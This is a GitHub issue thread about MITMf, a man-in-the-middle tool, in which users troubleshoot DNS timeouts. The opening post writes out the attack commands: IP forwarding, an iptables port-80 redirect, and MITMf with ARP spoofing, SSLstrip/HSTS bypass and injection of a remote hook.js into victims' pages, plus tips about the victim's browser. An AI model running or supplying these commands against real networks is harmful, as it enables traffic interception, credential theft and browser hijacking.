### ISSUE TITLE
[DNS] Could not proxy request: timed out

### ISSUE THREAD

**Issue by Ahmedabdsalam** [byt3bl33d3r/MITMf#368]
I did  echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 
mitmf --hsts --spoof --arp -i eth0 --gateway x.x.x.x --inject --js-url  http://x.x.x.x:3000/hook.js
                                                    
 __  __   ___   .--.          __  __   ___              
|  |/  `.'   `. |__|         |  |/  `.'   `.      _.._  
|   .-.  .-.   '.--.     .|  |   .-.  .-.   '   .' .._| 
|  |  |  |  |  ||  |   .' |_ |  |  |  |  |  |   | '     
|  |  |  |  |  ||  | .'     ||  |  |  |  |  | __| |__   
|  |  |  |  |  ||  |'--.  .-'|  |  |  |  |  ||__   __|  
|  |  |  |  |  ||  |   |  |  |  |  |  |  |  |   | |     
|__|  |__|  |__||__|   |  |  |__|  |__|  |__|   | |     
                       |  '.'                   | |     
                       |   /                    | |     
                       `'-'                     |_|

[*] MITMf v0.9.8 - 'The Dark Side'
|_ Inject v0.4
|_ Spoof v0.6
|  |_ ARP spoofing enabled
|_ SSLstrip+ v0.4
|  |_ SSLstrip+ by Leonardo Nve running
|
|_ Sergio-Proxy v0.2.1 online
|_ SSLstrip v0.9 by Moxie Marlinspike online
|
|_ Net-Creds v1.0 online
|_ MITMf-API online
 * Running on http://127.0.0.1:9999/ (Press CTRL+C to quit)
|_ HTTP server online
|_ DNSChef v0.4 online
|_ SMB server online

2017-01-11 19:42:49 192.168.1.3 [DNS] Could not proxy request: timed out
2017-01-11 19:42:49 192.168.1.3 [DNS] Could not proxy request: timed out

**Comment by Saferman** [comment]
me,too

**Comment by jfxmedia** [comment]
Same here. Time out.

**Comment by z00z** [comment]
If Kali is installed as a virtual machine, then try to disconnect it from all other networks and make sure that its only connected to the the target network.
Check out the following video as this is how I managed to solve it
https://youtu.be/L05ajtU_Lbk

**Comment by jeankoffi543** [comment]
if you have this mistake it is because mitmf can't resolve again the same request.  clean victim browser caching and make the test it will work now.

**Comment by byt3bl33d3r** [comment]
See my response in #381
